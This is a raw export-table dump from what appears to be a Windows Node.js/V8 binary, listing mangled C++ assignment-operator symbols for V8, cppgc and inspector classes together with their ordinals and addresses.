                                                                                                                                                                                                        ??4CodeEvent@v8@@QEAAAEAV01@$$QEAV01@@Z18300x140078ac0
                                                                                                                                                                                                        ??4CodeEvent@v8@@QEAAAEAV01@AEBV01@@Z18310x140078ac0
                                                                                                                                                                                                        ??4CodeFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18320x140078ac0
                                                                                                                                                                                                        ??4CodeFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z18330x140078ac0
                                                                                                                                                                                                        ??4CodeObjectRegistry@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18340x14047e870
                                                                                                                                                                                                        ??4CodeObjectRegistry@internal@v8@@QEAAAEAV012@AEBV012@@Z18350x14047e8a0
                                                                                                                                                                                                        ??4CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAAAEAV012@AEBV012@@Z18360x140078ac0
                                                                                                                                                                                                        ??4CompilationJob@internal@v8@@QEAAAEAV012@AEBV012@@Z18370x14047e8d0
                                                                                                                                                                                                        ??4CompilationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18380x140078ac0
                                                                                                                                                                                                        ??4CompilationState@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18390x140078ac0
                                                                                                                                                                                                        ??4Compiler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18400x140078ac0
                                                                                                                                                                                                        ??4Compiler@internal@v8@@QEAAAEAV012@AEBV012@@Z18410x140078ac0
                                                                                                                                                                                                        ??4Constant@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18420x1404bae20
                                                                                                                                                                                                        ??4Constant@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18430x140079760
                                                                                                                                                                                                        ??4ConstantArrayBuilder@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18440x1408f0af0
                                                                                                                                                                                                        ??4Contents@ArrayBuffer@v8@@QEAAAEAV012@$$QEAV012@@Z18450x140079710
                                                                                                                                                                                                        ??4Contents@ArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z18460x1400796e0
                                                                                                                                                                                                        ??4Contents@SharedArrayBuffer@v8@@QEAAAEAV012@$$QEAV012@@Z18470x140079710
                                                                                                                                                                                                        ??4Contents@SharedArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z18480x1400796e0
                                                                                                                                                                                                        ??4Context@v8@@QEAAAEAV01@$$QEAV01@@Z18490x140078ac0
                                                                                                                                                                                                        ??4Context@v8@@QEAAAEAV01@AEBV01@@Z18500x140078ac0
                                                                                                                                                                                                        ??4Counters@V8Inspector@v8_inspector@@QEAAAEAV012@AEBV012@@Z18510x14042e020
                                                                                                                                                                                                        ??4Coverage@debug@v8@@QEAAAEAV012@$$QEAV012@@Z18520x14047e8f0
                                                                                                                                                                                                        ??4CppGraphBuilder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18530x140078ac0
                                                                                                                                                                                                        ??4CppGraphBuilder@internal@v8@@QEAAAEAV012@AEBV012@@Z18540x140078ac0
                                                                                                                                                                                                        ??4CppHeap@v8@@QEAAAEAV01@AEBV01@@Z18550x140078ac0
                                                                                                                                                                                                        ??4CpuFeatureScope@internal@v8@@QEAAAEAV012@AEBV012@@Z18560x140078ac0
                                                                                                                                                                                                        ??4CpuProfile@v8@@QEAAAEAV01@$$QEAV01@@Z18570x140078ac0
                                                                                                                                                                                                        ??4CpuProfile@v8@@QEAAAEAV01@AEBV01@@Z18580x140078ac0
                                                                                                                                                                                                        ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@$$QEAU01@@Z18590x140079fa0
                                                                                                                                                                                                        ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@AEBU01@@Z18600x140079f00
                                                                                                                                                                                                        ??4CpuProfileNode@v8@@QEAAAEAV01@$$QEAV01@@Z18610x140078ac0
                                                                                                                                                                                                        ??4CpuProfileNode@v8@@QEAAAEAV01@AEBV01@@Z18620x140078ac0
                                                                                                                                                                                                        ??4CpuProfilingOptions@v8@@QEAAAEAV01@$$QEAV01@@Z18630x14007a000
                                                                                                                                                                                                        ??4CpuProfilingOptions@v8@@QEAAAEAV01@AEBV01@@Z18640x140079fe0
                                                                                                                                                                                                        ??4CreateParams@Isolate@v8@@QEAAAEAU012@AEBU012@@Z18650x140079c70
                                                                                                                                                                                                        ??4Data@v8@@QEAAAEAV01@$$QEAV01@@Z18660x140078ac0
                                                                                                                                                                                                        ??4Data@v8@@QEAAAEAV01@AEBV01@@Z18670x140078ac0
                                                                                                                                                                                                        ??4DataView@v8@@QEAAAEAV01@$$QEAV01@@Z18680x140078ac0
                                                                                                                                                                                                        ??4DataView@v8@@QEAAAEAV01@AEBV01@@Z18690x140078ac0
                                                                                                                                                                                                        ??4Date@v8@@QEAAAEAV01@$$QEAV01@@Z18700x140078ac0
                                                                                                                                                                                                        ??4Date@v8@@QEAAAEAV01@AEBV01@@Z18710x140078ac0
                                                                                                                                                                                                        ??4DateCache@internal@v8@@QEAAAEAV012@AEBV012@@Z18720x140705910
                                                                                                                                                                                                        ??4DbgStreamBuf@internal@v8@@QEAAAEAV012@AEBV012@@Z18730x14047e910
                                                                                                                                                                                                        ??4DefaultEmbedderRootsHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18740x140079b10
                                                                                                                                                                                                        ??4DefaultEmbedderRootsHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z18750x140079b10
                                                                                                                                                                                                        ??4DefaultPlatform@cppgc@@QEAAAEAV01@$$QEAV01@@Z18760x1404674d0
                                                                                                                                                                                                        ??4Delegate@ValueDeserializer@v8@@QEAAAEAV012@AEBV012@@Z18770x140078ac0
                                                                                                                                                                                                        ??4Delegate@ValueSerializer@v8@@QEAAAEAV012@AEBV012@@Z18780x140078ac0
                                                                                                                                                                                                        ??4DeleteACHHandle@node@@QEAAAEAU01@$$QEAU01@@Z18790x140078ac0
                                                                                                                                                                                                        ??4DeleteACHHandle@node@@QEAAAEAU01@AEBU01@@Z18800x140078ac0
                                                                                                                                                                                                        ??4Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18810x14047e960
                                                                                                                                                                                                        ??4Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z18820x140079a50
                                                                                                                                                                                                        ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18830x140079920
                                                                                                                                                                                                        ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@AEBV012@@Z18840x140079900
                                                                                                                                                                                                        ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z18850x140079a70
                                                                                                                                                                                                        ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18860x140079a50
                                                                                                                                                                                                        ??4DiscardedSamplesDelegate@v8@@QEAAAEAV01@AEBV01@@Z18870x140078ac0
                                                                                                                                                                                                        ??4DisjointAllocationPool@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18880x14047e980
                                                                                                                                                                                                        ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z18890x140078ac0
                                                                                                                                                                                                        ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z18900x140078ac0
                                                                                                                                                                                                        ??4EhFrameConstants@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18910x140078ac0
                                                                                                                                                                                                        ??4EhFrameConstants@internal@v8@@QEAAAEAV012@AEBV012@@Z18920x140078ac0
                                                                                                                                                                                                        ??4EhFrameIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18930x140079920
                                                                                                                                                                                                        ??4EhFrameIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18940x140079900
                                                                                                                                                                                                        ??4EmbedderGraph@v8@@QEAAAEAV01@AEBV01@@Z18950x140078ac0
                                                                                                                                                                                                        ??4EmbedderHeapTracer@v8@@QEAAAEAV01@AEBV01@@Z18960x140079b10
                                                                                                                                                                                                        ??4EmbedderRootsHandler@v8@@QEAAAEAV01@AEBV01@@Z18970x140078ac0
                                                                                                                                                                                                        ??4EnabledCheckingPolicy@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z18980x140078b00
                                                                                                                                                                                                        ??4EnabledCheckingPolicy@internal@cppgc@@QEAAAEAV012@AEBV012@@Z18990x140078b00
                                                                                                                                                                                                        ??4Entry@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z19000x14047e5f0
                                                                                                                                                                                                        ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19010x140078b00
                                                                                                                                                                                                        ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z19020x140078b00
                                                                                                                                                                                                        ??4Exception@v8@@QEAAAEAV01@$$QEAV01@@Z19030x140078ac0
                                                                                                                                                                                                        ??4Exception@v8@@QEAAAEAV01@AEBV01@@Z19040x140078ac0
                                                                                                                                                                                                        ??4Exported@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z19050x140078ac0
                                                                                                                                                                                                        ??4External@v8@@QEAAAEAV01@$$QEAV01@@Z19060x140078ac0
                                                                                                                                                                                                        ??4External@v8@@QEAAAEAV01@AEBV01@@Z19070x140078ac0
                                                                                                                                                                                                        ??4ExternalPointerTable@internal@v8@@QEAAAEAV012@AEBV012@@Z19080x140079900
                                                                                                                                                                                                        ??4ExternalResourceVisitor@v8@@QEAAAEAV01@AEBV01@@Z19090x140078ac0
                                                                                                                                                                                                        ??4ExternalSourceStream@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z19100x140078ac0
                                                                                                                                                                                                        ??4Factory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19110x140078ac0
                                                                                                                                                                                                        ??4Factory@internal@v8@@QEAAAEAV012@AEBV012@@Z19120x140078ac0
                                                                                                                                                                                                        ??4FeedbackIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19130x14047ea20
                                                                                                                                                                                                        ??4FeedbackIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z19140x140079a00
                                                                                                                                                                                                        ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19150x14047ea50
                                                                                                                                                                                                        ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@AEBV012@@Z19160x14047eb80
                                                                                                                                                                                                        ??4FixedArray@v8@@QEAAAEAV01@$$QEAV01@@Z19170x140078ac0
                                                                                                                                                                                                        ??4FixedArray@v8@@QEAAAEAV01@AEBV01@@Z19180x140078ac0
                                                                                                                                                                                                        ??4FlagList@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19190x140078ac0
                                                                                                                                                                                                        ??4FlagList@internal@v8@@QEAAAEAV012@AEBV012@@Z19200x140078ac0
                                                                                                                                                                                                        ??4FlatStringReader@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19210x14047ec70
                                                                                                                                                                                                        ??4FlatStringReader@internal@v8@@QEAAAEAV012@AEBV012@@Z19220x14047ec70
                                                                                                                                                                                                        ??4Float32Array@v8@@QEAAAEAV01@$$QEAV01@@Z19230x140078ac0
                                                                                                                                                                                                        ??4Float32Array@v8@@QEAAAEAV01@AEBV01@@Z19240x140078ac0
                                                                                                                                                                                                        ??4Float64Array@v8@@QEAAAEAV01@$$QEAV01@@Z19250x140078ac0
                                                                                                                                                                                                        ??4Float64Array@v8@@QEAAAEAV01@AEBV01@@Z19260x140078ac0
                                                                                                                                                                                                        ??4FreeList@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z19270x140466940
                                                                                                                                                                                                        ??4Function@v8@@QEAAAEAV01@$$QEAV01@@Z19280x140078ac0
                                                                                                                                                                                                        ??4Function@v8@@QEAAAEAV01@AEBV01@@Z19290x140078ac0
                                                                                                                                                                                                        ??4FunctionData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z19300x14047e5f0
                                                                                                                                                                                                        ??4FunctionTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z19310x140078ac0
                                                                                                                                                                                                        ??4FunctionTemplate@v8@@QEAAAEAV01@AEBV01@@Z19320x140078ac0
                                                                                                                                                                                                        ??4GlobalDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19330x140078b00
                                                                                                                                                                                                        ??4GlobalDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z19340x140078b00
                                                                                                                                                                                                        ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19350x140078ac0
                                                                                                                                                                                                        ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@AEBV012@@Z19360x140078ac0
                                                                                                                                                                                                        ??4HashTableBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19370x140078b00
                                                                                                                                                                                                        ??4HashTableBase@internal@v8@@QEAAAEAV012@AEBV012@@Z19380x140078b00
                                                                                                                                                                                                        ??4Heap@cppgc@@QEAAAEAV01@AEBV01@@Z19390x140078ac0
                                                                                                                                                                                                        ??4HeapCodeStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z19400x140079920
                                                                                                                                                                                                        ??4HeapCodeStatistics@v8@@QEAAAEAV01@AEBV01@@Z19410x140079900
                                                                                                                                                                                                        ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19420x1404bae40
                                                                                                                                                                                                        ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19430x140079900
                                                                                                                                                                                                        ??4HeapGraphEdge@v8@@QEAAAEAV01@$$QEAV01@@Z19440x140078ac0
                                                                                                                                                                                                        ??4HeapGraphEdge@v8@@QEAAAEAV01@AEBV01@@Z19450x140078ac0
                                                                                                                                                                                                        ??4HeapGraphNode@v8@@QEAAAEAV01@$$QEAV01@@Z19460x140078ac0
                                                                                                                                                                                                        ??4HeapGraphNode@v8@@QEAAAEAV01@AEBV01@@Z19470x140078ac0
                                                                                                                                                                                                        ??4HeapHandle@cppgc@@QEAAAEAV01@$$QEAV01@@Z19480x140078ac0
                                                                                                                                                                                                        ??4HeapHandle@cppgc@@QEAAAEAV01@AEBV01@@Z19490x140078ac0
                                                                                                                                                                                                        ??4HeapObjectStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z19500x140079a70
                                                                                                                                                                                                        ??4HeapObjectStatistics@v8@@QEAAAEAV01@AEBV01@@Z19510x140079a50
                                                                                                                                                                                                        ??4HeapRegistry@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z19520x140078ac0
                                                                                                                                                                                                        ??4HeapRegistry@internal@cppgc@@QEAAAEAV012@AEBV012@@Z19530x140078ac0
                                                                                                                                                                                                        ??4HeapSnapshot@v8@@QEAAAEAV01@$$QEAV01@@Z19540x140078ac0
                                                                                                                                                                                                        ??4HeapSnapshot@v8@@QEAAAEAV01@AEBV01@@Z19550x140078ac0
                                                                                                                                                                                                        ??4HeapSpaceStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z19560x140079a20
                                                                                                                                                                                                        ??4HeapSpaceStatistics@v8@@QEAAAEAV01@AEBV01@@Z19570x140079a00
                                                                                                                                                                                                        ??4HeapState@subtle@cppgc@@QEAAAEAV012@$$QEAV012@@Z19580x140078ac0
                                                                                                                                                                                                        ??4HeapState@subtle@cppgc@@QEAAAEAV012@AEBV012@@Z19590x140078ac0
                                                                                                                                                                                                        ??4HeapStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z19600x140079980
                                                                                                                                                                                                        ??4HeapStatistics@v8@@QEAAAEAV01@AEBV01@@Z19610x140079940
                                                                                                                                                                                                        ??4HiddenFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19620x140078ac0
                                                                                                                                                                                                        ??4HiddenFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z19630x140078ac0
                                                                                                                                                                                                        ??4HiddenLocalFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19640x140078b00
                                                                                                                                                                                                        ??4HiddenLocalFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z19650x140078b00
                                                                                                                                                                                                        ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19660x140078b00
                                                                                                                                                                                                        ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z19670x140078b00
                                                                                                                                                                                                        ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19680x140078b00
                                                                                                                                                                                                        ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z19690x140078b00
                                                                                                                                                                                                        ??4ImportAssertionsKeyComparer@internal@v8@@QEAAAEAU012@$$QEAU012@@Z19700x140078ac0
                                                                                                                                                                                                        ??4ImportAssertionsKeyComparer@internal@v8@@QEAAAEAU012@AEBU012@@Z19710x140078ac0
                                                                                                                                                                                                        ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z19720x140079d90
                                                                                                                                                                                                        ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z19730x140079760
                                                                                                                                                                                                        ??4Inspectable@V8InspectorSession@v8_inspector@@QEAAAEAV012@AEBV012@@Z19740x140078ac0
                                                                                                                                                                                                        ??4InstantiationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19750x140078ac0
                                                                                                                                                                                                        ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19760x140078b00
                                                                                                                                                                                                        ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19770x140078b00
                                                                                                                                                                                                        ??4Int16Array@v8@@QEAAAEAV01@$$QEAV01@@Z19780x140078ac0
                                                                                                                                                                                                        ??4Int16Array@v8@@QEAAAEAV01@AEBV01@@Z19790x140078ac0
                                                                                                                                                                                                        ??4Int32@v8@@QEAAAEAV01@$$QEAV01@@Z19800x140078ac0
                                                                                                                                                                                                        ??4Int32@v8@@QEAAAEAV01@AEBV01@@Z19810x140078ac0
                                                                                                                                                                                                        ??4Int32Array@v8@@QEAAAEAV01@$$QEAV01@@Z19820x140078ac0
                                                                                                                                                                                                        ??4Int32Array@v8@@QEAAAEAV01@AEBV01@@Z19830x140078ac0
                                                                                                                                                                                                        ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z19840x14047ef40
                                                                                                                                                                                                        ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z19850x14047efe0
                                                                                                                                                                                                        ??4Int8Array@v8@@QEAAAEAV01@$$QEAV01@@Z19860x140078ac0
                                                                                                                                                                                                        ??4Int8Array@v8@@QEAAAEAV01@AEBV01@@Z19870x140078ac0
                                                                                                                                                                                                        ??4Integer@v8@@QEAAAEAV01@$$QEAV01@@Z19880x140078ac0
                                                                                                                                                                                                        ??4Integer@v8@@QEAAAEAV01@AEBV01@@Z19890x140078ac0
                                                                                                                                                                                                        ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19900x140078b00
                                                                                                                                                                                                        ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z19910x140078b00
                                                                                                                                                                                                        ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19920x14047ecb0
                                                                                                                                                                                                        ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@AEBV012@@Z19930x14047ed40
                                                                                                                                                                                                        ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19940x14047edc0
                                                                                                                                                                                                        ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@AEBV012@@Z19950x14047ee50
                                                                                                                                                                                                        ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19960x140078ac0
                                                                                                                                                                                                        ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19970x140078ac0
                                                                                                                                                                                                        ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19980x140078ac0
                                                                                                                                                                                                        ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@AEBV012@@Z19990x140078ac0
                                                                                                                                                                                                        ??4IsolatePlatformDelegate@node@@QEAAAEAV01@$$QEAV01@@Z20000x140078ac0
                                                                                                                                                                                                        ??4IsolatePlatformDelegate@node@@QEAAAEAV01@AEBV01@@Z20010x140078ac0
                                                                                                                                                                                                        ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20020x140079760
                                                                                                                                                                                                        ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20030x140079760
                                                                                                                                                                                                        ??4JSHeapConsistency@v8@@QEAAAEAV01@$$QEAV01@@Z20040x140078ac0
                                                                                                                                                                                                        ??4JSHeapConsistency@v8@@QEAAAEAV01@AEBV01@@Z20050x140078ac0
                                                                                                                                                                                                        ??4JSHeapCopyReducer@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20060x140079b10
                                                                                                                                                                                                        ??4JSHeapCopyReducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20070x140079b10
                                                                                                                                                                                                        ??4JSON@v8@@QEAAAEAV01@$$QEAV01@@Z20080x140078ac0
                                                                                                                                                                                                        ??4JSON@v8@@QEAAAEAV01@AEBV01@@Z20090x140078ac0
                                                                                                                                                                                                        ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20100x140078b10
                                                                                                                                                                                                        ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20110x140078b00
                                                                                                                                                                                                        ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20120x14047eed0
                                                                                                                                                                                                        ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20130x140079900
                                                                                                                                                                                                        ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20140x140078ac0
                                                                                                                                                                                                        ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20150x140078ac0
                                                                                                                                                                                                        ??4LiveEdit@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20160x140078ac0
                                                                                                                                                                                                        ??4LiveEdit@internal@v8@@QEAAAEAV012@AEBV012@@Z20170x140078ac0
                                                                                                                                                                                                        ??4LivenessBroker@cppgc@@QEAAAEAV01@$$QEAV01@@Z20180x140078ac0
                                                                                                                                                                                                        ??4LivenessBroker@cppgc@@QEAAAEAV01@AEBV01@@Z20190x140078ac0
                                                                                                                                                                                                        ??4LivenessBrokerFactory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20200x140078ac0
                                                                                                                                                                                                        ??4LivenessBrokerFactory@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20210x140078ac0
                                                                                                                                                                                                        ??4LocalAllocationBuffer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20220x140955d30
                                                                                                                                                                                                        ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20230x14053e550
                                                                                                                                                                                                        ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20240x14053e6d0
                                                                                                                                                                                                        ??4LocalFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20250x140078b00
                                                                                                                                                                                                        ??4LocalFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z20260x140078b00
                                                                                                                                                                                                        ??4Location@debug@v8@@QEAAAEAV012@$$QEAV012@@Z20270x14047eef0
                                                                                                                                                                                                        ??4Location@debug@v8@@QEAAAEAV012@AEBV012@@Z20280x140079fe0
                                                                                                                                                                                                        ??4Location@v8@@QEAAAEAV01@$$QEAV01@@Z20290x140078b10
                                                                                                                                                                                                        ??4Location@v8@@QEAAAEAV01@AEBV01@@Z20300x140078b00
                                                                                                                                                                                                        ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20310x140078ac0
                                                                                                                                                                                                        ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20320x140078ac0
                                                                                                                                                                                                        ??4MakeGarbageCollectedTraitInternal@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20330x140078ac0
                                                                                                                                                                                                        ??4MakeGarbageCollectedTraitInternal@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20340x140078ac0
                                                                                                                                                                                                        ??4Malloced@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20350x140078ac0
                                                                                                                                                                                                        ??4Malloced@internal@v8@@QEAAAEAV012@AEBV012@@Z20360x140078ac0
                                                                                                                                                                                                        ??4Map@v8@@QEAAAEAV01@$$QEAV01@@Z20370x140078ac0
                                                                                                                                                                                                        ??4Map@v8@@QEAAAEAV01@AEBV01@@Z20380x140078ac0
                                                                                                                                                                                                        ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20390x140079760
                                                                                                                                                                                                        ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20400x140079760
                                                                                                                                                                                                        ??4MapUpdater@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20410x1406faac0
                                                                                                                                                                                                        ??4MapUpdater@internal@v8@@QEAAAEAV012@AEBV012@@Z20420x1406fab70
                                                                                                                                                                                                        ??4MarkerFactory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20430x140078ac0
                                                                                                                                                                                                        ??4MarkerFactory@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20440x140078ac0
                                                                                                                                                                                                        ??4MeasureMemoryDelegate@internal@v8@@QEAAAEAV012@AEBV012@@Z20450x140970fd0
                                                                                                                                                                                                        ??4MeasureMemoryDelegate@v8@@QEAAAEAV01@AEBV01@@Z20460x140078ac0
                                                                                                                                                                                                        ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20470x140078ac0
                                                                                                                                                                                                        ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@AEBV012@@Z20480x140078ac0
                                                                                                                                                                                                        ??4MemoryMappedFile@OS@base@v8@@QEAAAEAV0123@AEBV0123@@Z20490x140078ac0
                                                                                                                                                                                                        ??4MemoryRegion@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20500x140079770
                                                                                                                                                                                                        ??4MemoryRegion@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20510x140079760
                                                                                                                                                                                                        ??4Message@v8@@QEAAAEAV01@$$QEAV01@@Z20520x140078ac0
                                                                                                                                                                                                        ??4Message@v8@@QEAAAEAV01@AEBV01@@Z20530x140078ac0
                                                                                                                                                                                                        ??4MessageLocation@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20540x14047ef10
                                                                                                                                                                                                        ??4MessageLocation@internal@v8@@QEAAAEAV012@AEBV012@@Z20550x140079a50
                                                                                                                                                                                                        ??4Module@v8@@QEAAAEAV01@$$QEAV01@@Z20560x140078ac0
                                                                                                                                                                                                        ??4Module@v8@@QEAAAEAV01@AEBV01@@Z20570x140078ac0
                                                                                                                                                                                                        ??4ModuleRequest@v8@@QEAAAEAV01@$$QEAV01@@Z20580x140078ac0
                                                                                                                                                                                                        ??4ModuleRequest@v8@@QEAAAEAV01@AEBV01@@Z20590x140078ac0
                                                                                                                                                                                                        ??4ModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20600x140078ac0
                                                                                                                                                                                                        ??4ModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20610x140078ac0
                                                                                                                                                                                                        ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z20620x140079760
                                                                                                                                                                                                        ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z20630x140079760
                                                                                                                                                                                                        ??4MultiIsolatePlatform@node@@QEAAAEAV01@AEBV01@@Z20640x140078ac0
                                                                                                                                                                                                        ??4Name@v8@@QEAAAEAV01@$$QEAV01@@Z20650x140078ac0
                                                                                                                                                                                                        ??4Name@v8@@QEAAAEAV01@AEBV01@@Z20660x140078ac0
                                                                                                                                                                                                        ??4NameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20670x140078b00
                                                                                                                                                                                                        ??4NameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z20680x140078b00
                                                                                                                                                                                                        ??4NameProvider@cppgc@@QEAAAEAV01@AEBV01@@Z20690x140078ac0
                                                                                                                                                                                                        ??4NameTraitBase@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20700x140078ac0
                                                                                                                                                                                                        ??4NameTraitBase@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20710x140078ac0
                                                                                                                                                                                                        ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20720x140078ac0
                                                                                                                                                                                                        ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@AEBV012@@Z20730x140078ac0
                                                                                                                                                                                                        ??4NativeContextStats@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20740x14047ef40
                                                                                                                                                                                                        ??4NativeContextStats@internal@v8@@QEAAAEAV012@AEBV012@@Z20750x14047efe0
                                                                                                                                                                                                        ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20760x140078ac0
